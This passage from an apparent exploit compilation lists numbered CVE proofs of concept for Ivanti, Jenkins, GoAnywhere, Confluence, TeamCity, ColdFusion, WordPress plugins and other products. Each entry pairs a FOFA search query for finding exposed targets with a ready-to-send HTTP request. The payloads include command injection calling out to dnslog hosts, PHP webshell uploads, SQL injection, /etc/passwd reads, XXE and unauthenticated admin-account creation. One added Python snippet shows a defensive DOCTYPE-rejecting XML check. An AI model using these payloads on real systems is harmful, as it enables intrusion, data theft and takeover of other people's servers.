Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg settings information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response (the file contents are echoed back inside the CLI error message):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[nonce value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 to 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (北京百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter value c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded (encoding, not encryption); it decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The output of the injected command (id) is returned in the X-Cmd-Response response header.

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then served from http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend with it; from there system commands can be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

This is a blind XXE: a DNS or HTTP callback on the dnslog host confirms that the server resolved the external entity.

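The Params document above declares an external entity whose system identifier is a dnslog hostname, so the attacker needs nothing from the response body; the resolver's lookup is the whole signal. The following is an added example, written for this compilation and not taken from the page or from Glodon's code, of the check that closes this bug class on the receiving side: refuse any document that carries a DOCTYPE at all, before the parser ever reaches an entity reference. Python is used for illustration (the real handler is an .ashx endpoint); the sample documents are a constructed copy of the request's Params value and a constructed benign document of the shape the endpoint presumably expects.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXml(ValueError):
    """Raised when untrusted XML carries a DOCTYPE and so may declare entities."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Pre-scan with expat and abort at the first DOCTYPE declaration.

    Entities (internal, external and parameter) can only be declared inside
    a DOCTYPE, so refusing the DOCTYPE closes XXE and entity-expansion
    attacks in one check, before any entity reference is ever seen.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising here aborts parser.Parse() and propagates to the caller.
        raise UnsafeXml(f"DOCTYPE {name!r} not allowed (system id {system_id!r})")

    parser.StartDoctypeDeclHandler = on_doctype
    # Belt and braces: even if a DOCTYPE slipped through, never fetch anything.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.ExternalEntityRefHandler = lambda *_args: 0   # 0 = refuse to resolve
    parser.Parse(xml_bytes, True)


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Return the root element of untrusted XML, or raise UnsafeXml."""
    reject_doctype(xml_bytes)
    return ET.fromstring(xml_bytes)


def classify(xml_bytes: bytes) -> str:
    """'blocked' for DOCTYPE-bearing input, otherwise the root element's tag."""
    try:
        return parse_untrusted(xml_bytes).tag
    except UnsafeXml:
        return "blocked"


# Constructed copy of the Params value from the DataExchange.ashx request above.
XXE_PARAMS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>"""

# Constructed benign document (assumed shape; the real schema is not on the page).
BENIGN_PARAMS = b'<?xml version="1.0"?><Params><SystemName>BIM</SystemName></Params>'


if __name__ == "__main__":
    print("xxe sample ->", classify(XXE_PARAMS))
    print("benign     ->", classify(BENIGN_PARAMS))
```

Rejecting the DOCTYPE outright is deliberately stricter than "disable external entities": it also stops internal-entity expansion bombs and parameter-entity tricks, and a data-exchange endpoint has no legitimate reason to accept a DTD from a client.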
128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, 2023 update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

Time-based blind injection in the orderBy parameter: the response is delayed by about 3 seconds when the database name is 11 characters long.

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

The request creates a new SYSTEM_ADMIN user without authentication; the path is a non-existent resource (/pwned) whose jsp parameter is forwarded to the REST endpoint, with the ;.jsp suffix satisfying the .jsp check.

CVE-2024-27199 (path traversal; these paths reach the admin diagnostics page without authentication):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

